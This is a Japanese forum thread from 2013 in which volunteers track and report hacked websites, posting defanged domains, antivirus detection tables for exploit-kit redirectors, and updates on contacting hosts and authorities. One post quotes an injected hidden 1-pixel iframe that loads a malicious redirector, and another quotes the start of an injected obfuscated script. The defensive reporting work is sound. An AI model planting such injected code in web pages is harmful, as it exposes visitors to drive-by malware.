MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
66:名無しさん@お腹いっぱい。
13/05/06 11:54:43.37 .net
覚音山 西徳寺
www●saitoku●net/
iframe name=Twitter scrolling=auto・・・
競馬の予想屋
keibaky●com
<!--c3284d--><script>try{1-prototype;}catch・・・
two2readblog●com
>不正なソフトウェアには 550 trojan(s) など
wwwwwwww
67:/名無しさん[1-30] ◆.htmlint.U
13/05/06 17:07:37.83 .net
上二つGMO、ばりゅどめにつーほー
68:/名無しさん[1-30] ◆.htmlint.U
13/05/07 22:48:30.83 .net
別件ばぅぁー
ひげおぢさん
> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.
>>64-65
なおた ヽ(´ー`)ノ
69:/名無しさん[1-30] ◆.htmlint.U
13/05/09 00:37:30.24 .net
RedKit Exploit Kit Redirector Site 某所のJSファイル
AntiVir HTML/TwitScroll.B 20130508
Avast JS:Iframe-AML [Trj] 20130508
AVG HTML/Framer 20130508
BitDefender Trojan.Iframe.CBN 20130508
Commtouch IFrame.gen 20130508
Comodo TrojWare.JS.Iframe.FK 20130508
Emsisoft Trojan.Iframe.CBN (B) 20130508
ESET-NOD32 JS/Iframe.HH 20130508
F-Prot IFrame.gen 20130508
F-Secure Trojan.Iframe.CBN 20130508
Fortinet JS/Iframe.HH!tr 20130508
GData Trojan.Iframe.CBN 20130508
Ikarus Exploit.HTML.IframeRef 20130508
Kaspersky HEUR:Trojan.Script.Generic 20130508
McAfee JS/IFrame.gen.j 20130508
McAfee-GW-Edition JS/IFrame.gen.j 20130508
Microsoft Exploit:HTML/IframeRef.DM 20130508
MicroWorld-eScan Trojan.Iframe.CBN 20130508
NANO-Antivirus Trojan.Html.TwitScroll.bklyhq 20130508
Norman Iframe.UW 20130508
nProtect Trojan.Iframe.CBN 20130508
PCTools Trojan.Webkit 20130508
Sophos Troj/Iframe-JG 20130508
Symantec Trojan.Webkit!html 20130508
VIPRE Malware.JS.Generic (JS) 20130508
おしんさん、がむばって
70:/名無しさん[1-30] ◆.htmlint.U
13/05/11 03:27:16.82 .net
改竄サイトをホスティングにつーほーしてるなまかへ
ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
71:/名無しさん[1-30] ◆.htmlint.U
13/05/12 04:06:17.40 .net
BlackHole Exploit Kit Redirector Siteの新種のScript
File type: HTML
Detection ratio: 1 / 46
Analysis date: 2013-05-11 18:18:17 UTC
Antivirus Result Update
Norman BlacoleRef.BA 20130511
んで、飛び先のひとつ
File type: HTML
Detection ratio: 6 / 46
Analysis date: 2013-05-11 18:39:21 UTC
Antivirus Result Update
BitDefender Trojan.Html.Fakealert.P 20130511
Emsisoft Trojan.Html.Fakealert.P (B) 20130511
F-Secure Trojan.Html.Fakealert.P 20130511
GData Trojan.Html.Fakealert.P 20130511
MicroWorld-eScan Trojan.Html.Fakealert.P 20130511
nProtect Trojan.Html.Fakealert.P 20130510
ESETもどきに連れてかれたん
72:名無しさん@お腹いっぱい。
13/05/14 15:02:24.37 .net
apple-hikkoshi●co●jp/
403、404が改竄されとるんw
ishigo●sytes●net
※電凸済み
73:名無しさん@お腹いっぱい。
13/05/14 15:43:19.30 .net
>>72 コード
<!-- . --><iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ></iframe><!-- . -->
74:名無しさん@お腹いっぱい。
13/05/14 17:50:17.38 .net
>>72
修正を確認すた…
75:/名無しさん[1-30] ◆.htmlint.U
13/05/14 23:29:00.06 .net
お疲れ様です。
某公益社団法人のサイトがやられていますた。>BlackHole Exploit Kit
おしんにめる済み
76:コテハン ◆8080adndqg
13/05/14 23:51:58.22 .net
kusuo-o●net
ど う し て こ う な っ た ?
c o m m o n / j s / s c r i p t . j s
77:名無しさん@お腹いっぱい。
13/05/15 00:20:03.95 .net
gakunavi●net
78:/名無しさん[1-30] ◆.htmlint.U
13/05/15 03:33:39.32 .net
>>76-77
どーん
>76
>>75と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。
>77
2013-05-07 08:28:11 UTC (日本時間 : 2013/5/07 17:28:11)にはVirusTotalに投げられてますた。
あきた寝る
79:コテハン ◆8080adndqg
13/05/15 13:52:46.96 .net
>>78
乙カレー丼
>>76はミンスのHPに投げてみた
80:コテハン ◆8080adndqg
13/05/15 18:08:56.74 .net
210●148●117●65/
色々な意味でスゲェw
81:コテハン ◆8080adndqg
13/05/15 21:28:52.01 .net
>>76 の件
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。
kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。
見に行ったらメンテ中だた...
82:/名無しさん[1-30] ◆.htmlint.U
13/05/15 23:35:51.92 .net
>>80
逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー
>>81
他のページやjsは生きてるお フミダイかも
再要請すた。
83:/名無しさん[1-30] ◆.htmlint.U
13/05/15 23:48:14.51 .net
> 再要請
さくらにつーほ >>6
84:名無しさん@お腹いっぱい。
13/05/16 00:23:25.72 .net
>>82 >>76
アーッ orz
85:コテハン ◆8080adndqg
13/05/16 00:26:17.37 .net
コテ忘れるし、sageてないし… orz
86:/名無しさん[1-30] ◆.htmlint.U
13/05/16 21:47:07.18 .net
>>76
さくら対応
>>80
御本人様から対応のお返事頂きました
以上確認しました。
皆様お疲れ様です。 m(_ _)m
87:/名無しさん[1-30] ◆.htmlint.U
13/05/23 02:59:40.68 .net
BlackHole Exploit Kit Redirector
検体2通、いくつか宛先不通になってた
1通目は、薬物(Viagra等)販売サイトのドメインがあったので
同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz...........
薬物販売サイトにも罠があるっぽい
File size:[TAB]50.3 KB ( 51517 bytes )
File type:[TAB]HTML
Detection ratio:[TAB] 2 / 47
Analysis date:[TAB] 2013-05-22 16:21:42 UTC
Antivirus [TAB] Result [TAB] Update
Avast [TAB] HTML:Script-inf [TAB] 20130522
GData [TAB] HTML:Script-inf [TAB] 20130522
88:/名無しさん[1-30] ◆.htmlint.U
13/05/23 03:06:22.26 .net
JaneViewの設定だお>[TAB]
>87やりなおし
File size: 50.3 KB ( 51517 bytes )
File name: pl.txt
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:21:42 UTC
Antivirus Result Update
Avast HTML:Script-inf 20130522
GData HTML:Script-inf 20130522
んで感染サイトのスクリプトは
File size: 8.4 KB ( 8624 bytes )
File name: index.html
File type: HTML
Detection ratio: 4 / 47
Analysis date: 2013-05-22 15:50:35 UTC
Antivirus Result Update
Fortinet JS/Iframe.DDG!tr.dldr 20130522
Kaspersky Trojan-Downloader.JS.Iframe.ddr 20130522
McAfee JS/Exploit-Blacole.ht 20130522
NANO-Antivirus Trojan.Script.Expack.bqgmvl
中間スクリプト
File size: 241 bytes ( 241 bytes )
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:12:15 UTC
Antivirus Result Update
McAfee Exploit-Rekit.f 20130522
Sophos Troj/ExpJS-II 20130522
89:/名無しさん[1-30] ◆.htmlint.U
13/05/25 03:41:39.54 .net
ァッー
追っかけてたら、辿り付いた
URLリンク(www.google.com)
クッションサイトだからかな
90:/名無しさん[1-30] ◆.htmlint.U
13/05/27 00:35:42.60 .net
RedKit Exploit Kit Redirector
ランダムな中間スクリプト
File type: HTML
Detection ratio: 3 / 47
Analysis date: 2013-05-26 14:39:38 UTC
McAfee JS/Exploit-Blacole.lt 20130526
McAfee-GW-Edition JS/Exploit-Blacole.lt 20130526
Sophos Troj/ExpJS-II 20130522
まかひとそふぉぉぉぉすががむばってるん
相変わらずこちらの環境ではブツ落とせないままぽ
91:/名無しさん[1-30] ◆.htmlint.U
13/05/29 13:33:43.54 .net
memo
g01pack exploit kit
エフセキュアブログ : g01pack
URLリンク(blog.f-secure.jp)
92:/名無しさん[1-30] ◆.htmlint.U
13/05/29 13:35:56.00 .net
>>91
現在の最新情報
エフセキュアブログ : g01packがシェア拡大の兆し
URLリンク(blog.f-secure.jp)
93:名無しさん@お腹いっぱい。
13/05/29 22:04:56.53 .net
www●muse●dti●ne●jp/~ohyes/
94:/名無しさん[1-30] ◆.htmlint.U
13/05/30 01:50:59.74 .net
>>93
お疲れ様です。
夢列車につーほーしますた。
95:/名無しさん[1-30] ◆.htmlint.U
13/05/31 00:40:02.78 .net
まだ直ってないようですが、
恐らくひげおぢさんがピコーンしたら対応されるかも>93
んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして>>15なぬかようか
96:/名無しさん[1-30] ◆.htmlint.U
13/05/31 13:55:45.14 .net
>>95
MD5: 444bcb3a3fcf8389296c49467f27e1d6
URLリンク(docs.google.com)
97:名無しさん@お腹いっぱい。
13/06/02 11:58:43.02 .net
www●trajal●net/k-b●html
www●f-airline●com/
lukes-world●co●jp/
www2●patt●gr●jp/~ryo/
98:名無しさん@お腹いっぱい。
13/06/02 12:18:40.44 .net
松浦とみよし 市議会議員
www4●ocn●ne●jp/~tomiyosi/
連絡したのにこの状態。。。
99:/名無しさん[1-30] ◆.htmlint.U
13/06/03 07:57:15.43 .net
>>97-98
お疲れ様です。
つーほーしました。
以前にもつーほーしたのがあったやうな
つーほー漏れかなん。。。orz...........
100:名無しさん@お腹いっぱい。
13/06/04 23:11:04.06 .net
申告しても対処しないサイト
www●yanagita-kk●co●jp/
www10●ocn●ne●jp/~kuushuu/ussbsindex●html
www●arpak-cdc●co●jp/
w01●tp1●jp/~a541677231/
nanaplan●jp/kako_kenngakusai●html
ir06●com/
www●garage-yamato●com/
www●fp-kazuna●com/insu/
www1●hinocatv●ne●jp/baba/
harakirievent●toypark●in/
101:名無しさん@お腹いっぱい。
13/06/04 23:13:15.28 .net
archivo-semiotica●com/
www●dorf●co●jp/access●html
www●utsunomiya-es●com/
mado-works●com/staff●html
www●86919●com/
xn--n8jxcwb2fra8229bokzg●com/
angelstone●co●jp/
bbs-beppin●com
www●presen●co●jp/SERV●html
harmony8●com
g2g2●jp/
caiquesarepeopletoo●com/
cairo123●com/
www●antwarp●jp/souvenir/monthly_select/
102:名無しさん@お腹いっぱい。
13/06/06 00:02:14.13 .net
>>100乙です
②まで上流に電話連絡済(対応する旨の事)
残件8
>>101乙です
残件14
103:名無しさん@お腹いっぱい。
13/06/06 18:43:47.73 .net
>>102
>>102
④まで済
尚、④に関しては、HI BIT 経由の情報として
警視庁サイバー犯罪対策課がHPの所有者に連絡済とのこと
104:名無しさん@お腹いっぱい。
13/06/06 18:51:12.95 .net
>>103
残権に関しては、警視庁のお手並み拝見ということで撤収
105:名無しさん@お腹いっぱい。
13/06/06 21:11:02.86 .net
何ヶ月も放置する駄目なOCNのユーザが大量感染
OCNはあてにならないので直接ユーザのメルアドに警告中。
メルアドがないのを助けてください
www1●ocn●ne●jp/~ganja/
www1●ocn●ne●jp/~oohata/
www1●ocn●ne●jp/~takano8/
www11●ocn●ne●jp/~uten/
www12●ocn●ne●jp/~kaido/rw/
106:名無しさん@お腹いっぱい。
13/06/06 21:33:28.35 .net
www14●ocn●ne●jp/~yu4127/
www15●ocn●ne●jp/~nakanoah/
www15●ocn●ne●jp/~toshikaz/
www15●ocn●ne●jp/~vento/
www17●ocn●ne●jp/~skynet/
www18●ocn●ne●jp/~answer/
www18●ocn●ne●jp/~cos/
107:名無しさん@お腹いっぱい。
13/06/06 23:26:08.97 .net
40件はHPのメルアドに警告完了
wwww2●ocn●ne●jp/~esi/
www18●ocn●ne●jp/~myouga/
www2●ocn●ne●jp/~littleb/
www2●ocn●ne●jp/~seafood/
www2●ocn●ne●jp/~skbld/
www2●ocn●ne●jp/~suwan/
www3●ocn●ne●jp/~charinko/
www3●ocn●ne●jp/~nino38/
108:名無しさん@お腹いっぱい。
13/06/06 23:30:15.76 .net
www4●ocn●ne●jp/~htgifu/
www8●ocn●ne●jp/~bito/
www8●ocn●ne●jp/~gzwave/
www8●ocn●ne●jp/~k-chico/
www9●ocn●ne●jp/~alingo/
109:/名無しさん[1-30] ◆.htmlint.U
13/06/07 05:56:19.42 .net
皆様お疲れ様です。
>>105-108
以前の分でおしんにめる届いてたっぽいので纏めてつーほ
フォームどーすべ
>>104
なので診ませんですた。>>100-101
目がイタイのでしばしリタイア
さいとあどばいざがgdgd。。。orz............
110:オルティス・ジャパン
13/06/07 18:11:49.68 .net
>>109
お大事に
>>105-108
連絡完了
OCNの中の人へ
対応窓口を誰にも分かるよう明確に、対応フローをしっかりとね
ついでに↓も見ておくといいかも
jpサート URLリンク(www.jpcert.or.jp)
Web サイト改ざんに関する注意喚起
URLリンク(www.jpcert.or.jp)
IPA URLリンク(www.ipa.go.jp)
2013年6月の呼びかけ「ウェブサイトが改ざんされないように対策を!」を公開しました。
URLリンク(www.ipa.go.jp)
「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け
URLリンク(www.itmedia.co.jp)
[データ] 「Webサイト改ざん」が急増、「ガンブラー」流行時に匹敵、IPAまとめ
URLリンク(bizmash.jp)
国内サイト20件以上で、政治的な改ざんが発生 - 扇動しており規模拡大に警戒を
URLリンク(www.security-next.com)
国内Webサイト改ざん事例続報:攻撃手法の詳細と得られる対策の教訓
URLリンク(blog.trendmicro.co.jp)
国内のWebサイトの改ざんが拡大中 | トレンドマイクロ セキュリティ ブログ ...
URLリンク(blog.trendmicro.co.jp)
日本のWebサイト狙った改ざん攻撃に注意 - トレンドマイクロ
URLリンク(news.mynavi.jp)
国内Webサイト改ざん事例、攻撃手法の詳細が判明 ― トレンドマイクロ
URLリンク(is702.jp)
111:名無しさん@お腹いっぱい。
13/06/08 05:54:44.41 .net
>>105-108 知ってるとこあって驚いた。どうやってこんなに大量に感染サイトを見つけてくるんですか?
112:名無しさん@お腹いっぱい。
13/06/08 11:25:10.36 .net
ブラウザがブロックする元の情報となっている
stopbadware です。
113:オルティス・ジャパン
13/06/08 13:44:30.41 .net
>>110
①のganjaに電話で確認してみました
OCNからの連絡はないとのこと
月曜以降に>>100の②に連絡した窓口に
お財布と相談しながら、もしかしたら連絡するかも
114:名無しさん@お腹いっぱい。
13/06/09 10:28:15.23 .net
ISPはOCNでだらしのないAbuseだし
何度もユーザにメールしても放置。
pacific-ocean●co●jp/
115:/名無しさん[1-30] ◆.htmlint.U
13/06/09 15:54:22.38 .net
あいぴーあどれすも ぁぅぁぅ
116:名無しさん@お腹いっぱい。
13/06/09 19:23:44.92 .net
icweb●jp/~mantashokudo/
www●fp-kazuna●com/insu/
showa-ts●co●jp/
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
117:名無しさん@お腹いっぱい。
13/06/09 19:27:11.63 .net
www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
118:/名無しさん[1-30] ◆.htmlint.U
13/06/10 06:00:10.72 .net
おぱようごぜぇやす
くこまでメルとかしまひた
補足
>>116にもあいぴーあどれす ぁぅぁぅがありますた
んで、いちばんすた、外部さいとが ぁぅぁぅ こりもつーほ
>>117のいちばんすた、壊れてるけどAviraがぴこーん
119:コテハン ◆8080adndqg
13/06/10 13:48:32.30 .net
今北三g・・・ orz
120:オルティス・ジャパン
13/06/10 18:01:56.25 .net
OCNはこのスレを巡回リストに入れたとの事なので自助努力して貰いましょう
つまり、このスレのOCNの改ざんサイトは、OCNが自主的に対応するということです
あんまり頑張り過ぎると禿げたり目が痛くなるので少しは楽をしましょう>>all
>>110
追加
5月末に急増した改ざん、「IISサーバ」が標的か - 「Gumblar」と類似点
URLリンク(www.security-next.com)
121:オルティス・ジャパン
13/06/10 19:42:55.95 .net
とはいえ>>113の>>110
①のganja ← これはHPの所有者に電話したので閉鎖されている様ですが
②oohataは対応されていません
おそらくOCNは口先だけなのでしょうね
なので、警視庁サイバー犯罪対策課の方
お話した通り逮捕しちゃってください
122:名無しさん@お腹いっぱい。
13/06/10 21:58:40.03 .net
申告したものも真面に対応できないOCNが。。。
デタラメでしょうね。
昔に、出会い系サイトにたいし警察から警告を受けたホスティング屋が
対応が遅かったりしなかったとして幇助で捕まったことがありましたが
本当に逮捕してくれるといいですね。OCNだと良い刺激になるでしょう
123:名無しさん@お腹いっぱい。
13/06/10 22:05:06.38 .net
そういえばOCNのメアドがわかる29サイトには、直接警告しましたが
50%は2日で対処している。OCNの案内は対処の仕方の案内が駄目なんでしょうね。
期限も切って表示停止にもできないチキンがOCNということでしょう
124:名無しさん@お腹いっぱい。
13/06/11 00:32:19.70 .net
>>105
>>106
別経由で連絡先わかったとこに電凸。
ほとんど皆さんからの警告も、OCNからの警告も気づいてないです。
むしろ、こっちが疑われて「この電話番号を警察に言う」とか逆切れされた(泣)
やっぱりおしんに元から強制排除してもらうのがいいかもしんない。
125:/名無しさん[1-30] ◆.htmlint.U
13/06/11 04:09:27.00 .net
> システムメンテナンス作業に伴うサービス停止のお知らせ
>
> ただ今、システムメンテナンス中のため、
> 弊社ホームページをご利用いただけません。
>
> ご不便おかけしますが、しばらくお待ちください。
ガ━━━∑(゚д゚lll)━━━ン
126:/名無しさん[1-30] ◆.htmlint.U
13/06/11 04:22:07.85 .net
んー、だめぽ
>>124
お疲れ様ですお疲れ様です。
それとなくJPCERTやIPAにこのスレのこと伝えてあるので……
127:/名無しさん[1-30] ◆.htmlint.U
13/06/11 08:01:38.68 .net
>>117のいちばんすた、Script追加されてた
ゆーどーさき こちらの環境だと>>96
128:/名無しさん[1-30] ◆.htmlint.U
13/06/11 16:38:08.62 .net
復帰カキコ
頭隠して尻隠さず ってのが某所にあるぽ
フミダイかなん
129:名無しさん@お腹いっぱい。
13/06/11 16:50:05.48 .net
operation name:hyaena
スレリンク(isp板)
130:名無しさん@お腹いっぱい。
13/06/11 21:48:45.60 .net
いやービックリ!あのOCNが本当に止めましたよ。
それでは、OCNさん以下も止めてください
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
www17●ocn●ne●jp/~skynet/
131:名無しさん@お腹いっぱい。
13/06/11 21:50:10.28 .net
www1●ocn●ne●jp/~agraph/
www1●ocn●ne●jp/~pageone/
www10●ocn●ne●jp/~akachanf/
www11●ocn●ne●jp/~gen0929/
www13●ocn●ne●jp/~yaesu/
www15●ocn●ne●jp/~yktk/
www17●ocn●ne●jp/~omura/
132:名無しさん@お腹いっぱい。
13/06/11 21:51:12.38 .net
www18●ocn●ne●jp/~b-miz/
www2●ocn●ne●jp/~kyowawin/
www2●ocn●ne●jp/~stkr/
www4●ocn●ne●jp/~sakura77/
www8●ocn●ne●jp/~daitou/
以下はリダイレクトページ
www17●ocn●ne●jp/~addtech/
www17●ocn●ne●jp/~kinsicho/
133:名無しさん@お腹いっぱい。
13/06/11 21:52:18.91 .net
OCNを動かしてくれた皆さん感謝です。
これも明日止まることを期待。。。
134:名無しさん@お腹いっぱい。
13/06/12 02:31:38.43 .net
それは無理かと
準備期間が必要でしょ(確認作業+連絡+猶予期間等々)
135:/名無しさん[1-30] ◆.htmlint.U
13/06/12 02:54:48.97 .net
むにゃむにゃねむい
先程フォームからつーほ>>6
すぐにお返事来ました。>>63
>>130-132
お疲れ様です。
>>120とゆーことで診ませんですた
って、いくつかつーほー済みのやうな…
136:名無しさん@お腹いっぱい。
13/06/12 21:47:14.90 .net
新規
www11●ocn●ne●jp/~sayacha/
www5●ocn●ne●jp/~fukuzen/
www7●ocn●ne●jp/~sclamp/
再感染(それも初めて見たパターン 新種?)
www16●ocn●ne●jp/~chesnuts/
Toppageだけ対処
www14●ocn●ne●jp/~teamf/touroku●html
www17●ocn●ne●jp/~clover4/cosmet_hair●html
www5●ocn●ne●jp/~sfuru/houshu/houshu_menu●htm
www8●ocn●ne●jp/~aikamu/company●html
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
137:名無しさん@お腹いっぱい。
13/06/13 00:02:58.92 .net
サーキュレーター探してたらいきなりMSEが開いた。
トロイの木馬ってのを検出して自動で削除画面が出る。
更新しても、そのたびに出る。
俺だけ?それともこの会社のページがだれかにやられたの?
株式会社ナカトミ | 45cm工場扇 OPF-45S
URLリンク(www.nakatomi-sangyo.com)
138:名無しさん@お腹いっぱい。
13/06/13 00:06:50.10 .net
Trojan:JS BlacoleRef.CZ
と名前はでてる
他にも一緒に入れられる?MSEはそれしか検出してないんだけど
139:名無しさん@お腹いっぱい。
13/06/13 00:25:03.38 .net
誤検出っぽい。お騒がせした。
140:/名無しさん[1-30] ◆.htmlint.U
13/06/13 02:07:47.53 .net
Aviraがピコーン
つーほー作業に入ります。。。
141:/名無しさん[1-30] ◆.htmlint.U
13/06/13 04:10:57.80 .net
つーほすた
142:名無しさん@お腹いっぱい。
13/06/14 08:09:48.69 .net
www●horizonz●co●jp
satochokusen●co●jp
143:オルティス・ジャパン
13/06/14 18:11:52.51 .net
>>130-132,136
なかなか対応されないので電話してみました
訃報です
OCNはこのスレの巡回を止めたそうです
正規のフロー(フォームから)に従って連絡があれば対応するとのこと
お問い合わせフォーム
http s:// cgi01.ocn.ne.jp/support/abuse/blog.html
今回は罪滅ぼしの意味合いで私がフォーム発射&完了
&担当部署(セキュリティ)に電話
144:/名無しさん[1-30] ◆.htmlint.U
13/06/14 18:38:13.90 .net
皆様
お疲れ様です
>>142
NTTPCコミュニケーションズにめるしました。
>>143
ガ━━━∑(゚д゚lll)━━━ン
145:/名無しさん[1-30] ◆.htmlint.U
13/06/15 04:54:48.05 .net
閑話休題 漏れがVTに投げた懐かしの8080
URLリンク(www.virustotal.com)
SHA256: 64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921
File size: 4.5 KB ( 4651 bytes )
File name: JavaGame.jar
File type: JAR
Detection ratio: 8 / 41
Analysis date: 2010-01-05 15:35:32 UTC
2年半経って誰かが投げてた
URLリンク(www.virustotal.com)
File size: 4.5 KB ( 4651 bytes )
File name: jar_cache8170738606501754937.tmp
Detection ratio: 31 / 42
Analysis date: 2012-06-23 11:45:06 UTC
同じ日に漏れがVTに投げた8080
URLリンク(www.virustotal.com)
SHA256: a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4
File size: 63 bytes ( 63 bytes )
File name: win.jpg
File type: unknown
Tags: exploit
cve-2008-0015
Detection ratio: 20 / 41
Analysis date: 2010-01-05 15:38:31 UTC
3年経って誰かが投げたの
URLリンク(www.virustotal.com)
File name: win[1]
Detection ratio: 16 / 45
Analysis date: 2013-03-13 11:15:04 UTC
定期的に誰かが過去のブツを診てるんだろか
しかも検出率が下がってるのがあるってのは……
146:/名無しさん[1-30] ◆.htmlint.U
13/06/15 07:07:05.32 .net
スレリンク(sec板:10番)
いつもお世話になってます。 m(_ _)m
改竄数20倍かぁ。。。
147:名無しさん@お腹いっぱい。
13/06/15 09:23:15.89 .net
www●miwax●co●jp/
nishikutu●co●jp/
chiyoda-nagoya●co●jp/
kaigokeieigakkai●jp/
www●hanabusa-office●jp/
casinotaro●com/
coscos●info/
orpheus●6●ql●bz/top●html
defi-pro●com/
himesou●jp/
www●eekuchikomi●com/
www●deaipeace●com/
148:名無しさん@お腹いっぱい。
13/06/15 13:03:07.84 .net
queenuruga●weblog●tc/
77x●info/
bukyu●net/
etaiken●info/
www●etaiken●info/
safetyzone●jp/
curesmile●net/
149:名無しさん@お腹いっぱい。
13/06/15 19:45:29.02 .net
>>147
⑨defi-pro●com/ 連絡済
⑩himesou●jp/ 404
⑤⑥⑦⑪⑫ デジロックは放置
>>148
①②③④⑤ デジロックは放置
⑦テラワロス
150:/名無しさん[1-30] ◆.htmlint.U
13/06/16 03:04:19.30 .net
お疲れ様です。
こちらからも受け取ってくれるかは不明ですが一通にてつーほーしました。
時間が掛かったので、既に対応してるっぽいのがあるん。。。orz......
>>149
> 404
www草付けるとピコーン
リダイレクトされてるお
151:名無しさん@お腹いっぱい。
13/06/16 19:29:24.79 .net
www●chiyoda-nagoya●co●jp/
curesmile●net/
shmj●jp/
152:/名無しさん[1-30] ◆.htmlint.U
13/06/17 03:16:39.52 .net
ハゲスクネモイ
お疲れ様です。
>>151
上二つは>>150で一つに纏めてホスティングにめる送付済み
最後のはIPアドレスもあばばばばば
誘導先もあばばばばば
これもIPアドレスあばばばばば
それぞれ分けて二通めるしました。
153:/名無しさん[1-30] ◆.htmlint.U
13/06/19 18:08:21.47 .net
Analysis Center (jpcert_ac) on Twitter
URLリンク(twitter.com)
> ここ最近の Web サイト改ざんですが、そのシグネチャである 6桁の 16進数からコードネーム: COLOR として我々は調査・分析を進めています。
URLリンク(twitter.com)
> Color 改ざんですが、現在確認できているパターンは画像のとおりです。他にも情報があれば是非ともご報告ください。
154:名無しさん@お腹いっぱい。
13/06/21 17:05:59.81 .net
相次ぐWebサイト改ざん被害 遅れる対応-ばびぶべぼBlog
blog.babibubebo.org/archives/648
155:名無しさん@お腹いっぱい。
13/06/21 22:11:14.21 .net
vol1●co●jp/
favorite-place●co●jp/
aa287●net/
27●50●104●30/
bluepower●jp/
156:名無しさん@お腹いっぱい。
13/06/21 22:35:23.34 .net
www●ocn●ne●jp/~usp
yc-oiso●co●jp/
www●vertex-co●jp/
vertex-co●jp/
sub-lease●co●jp/
157:名無しさん@お腹いっぱい。
13/06/21 22:53:40.82 .net
越谷市議会議員 大石みえこ
www●me-oec●jp/
158:/名無しさん[1-30] ◆.htmlint.U
13/06/22 03:20:42.05 .net
一箇所診るのに3時間……
おつかれさまです
っと、ゆーわけで155の一番目だけめるしました。
(゚ν゚) 説明ムズカスィネー
159:名無しさん@お腹いっぱい。
13/06/22 11:38:51.48 .net
www1●ocn●ne●jp/~hiroin/
www1●ocn●ne●jp/~ruri-5k/
www3●ocn●ne●jp/~kyouei/
www3●ocn●ne●jp/~ootsuka3/
www3●ocn●ne●jp/~yuuaikai/
www5●ocn●ne●jp/~itosj/
www5●ocn●ne●jp/~pogo/index5●html
www6●ocn●ne●jp/~no-seki/espanol/este_instituto●htm
www6●ocn●ne●jp/~snwest/
www6●ocn●ne●jp/~yoko-yh/
160:名無しさん@お腹いっぱい。
13/06/22 11:41:15.19 .net
www7●ocn●ne●jp/~jasmine1/
www8●ocn●ne●jp/~ntlkk/
www10●ocn●ne●jp/~usp/
www11●ocn●ne●jp/~noburu/
www12●ocn●ne●jp/~hokuyou/
www13●ocn●ne●jp/~tpark/
www15●ocn●ne●jp/~super/4rinbkpad/click-htm/honda-click●htm
www16●ocn●ne●jp/~m●hiroba/
www16●ocn●ne●jp/~permayav/
www16●ocn●ne●jp/~voyager3/
www18●ocn●ne●jp/~yrfc/
www2●ocn●ne●jp/~oimo/
161:名無しさん@お腹いっぱい。
13/06/22 12:37:49.44 .net
福島県商工会連合会
www●do-fukushima●or●jp/fukuseiren/
商工会ってどこも感染しまくっている
162:名無しさん@お腹いっぱい。
13/06/22 12:56:41.06 .net
>>155
①②③④⑤
NTTコミュニケーションズのブツは>>143のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
>>156
① 404
②③④
NTTコミュニケーションズのブツは>>143のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
⑤私に分からないのでパス
>>157
議員本人に連絡、完了
>>159-161
後程
163:名無しさん@お腹いっぱい。
13/06/22 13:54:12.02 .net
>>159-160
フォーム発射完了
>>161
月曜以降
164:名無しさん@お腹いっぱい。
13/06/22 17:44:17.63 .net
kobeiccgolf●or●jp/kita_kobe/gdo/
c-house●or●jp/
akashikaisei-hp●or●jp/recruit_contact
kumamoto-norimen●or●jp/
www●la-la-la●or●jp/
165:名無しさん@お腹いっぱい。
13/06/22 18:50:59.45 .net
>>164
①③OCNフォーム発射完了
②④⑤月曜以降
166:名無しさん@お腹いっぱい。
13/06/23 10:17:45.63 .net
esn●co●jp
futurebud●co●jp
h-seiken●co●jp
haruyamakensetsu●co●jp/include/url●js
kizaitecto●co●jp
kk-nishimaki●co●jp/js/window●js
kk-nishimaki●co●jp/js/navi●js
mikic●co●jp
morisaki-kk●co●jp
muratasekkei●co●jp
167:名無しさん@お腹いっぱい。
13/06/23 10:46:18.92 .net
advance-sakura●co●jp
eishin-maoyi●co●jp
favorite-place●co●jp
grow-ltd●co●jp
h-refresh●co●jp
innk●co●jp
k02●co●jp
kaigai-inc●co●jp/resource/secure/ 改ざん
kasuga-mfg●co●jp
okamoto-denki●co●jp
168:コテハン ◆8080adndqg
13/06/23 12:14:11.95 .net
www●znet●ne●jp/msd/
www●createur-net●com/
www●araiyasan●jp/
www●tuziwa●jp/
ichigu●memopad●org/
8080並みやね…これ
169:名無しさん@お腹いっぱい。
13/06/23 12:22:23.24 .net
>>166
①②④⑤⑧⑨ OCNフォーム発射完了
⑥⑦0c0896確認 OCNフォーム発射完了
③私には分からないのでパス
>>167
①②③④⑤⑥⑦⑨⑩
OCNフォーム発射完了
⑧私には分からないのでOCNへ、改ざん有無の精査を依頼
170:コテハン ◆8080adndqg
13/06/23 12:29:00.49 .net
>>168
www●znet●ne●jp/msd/
鯖丸ごとやられてる感じw
↓
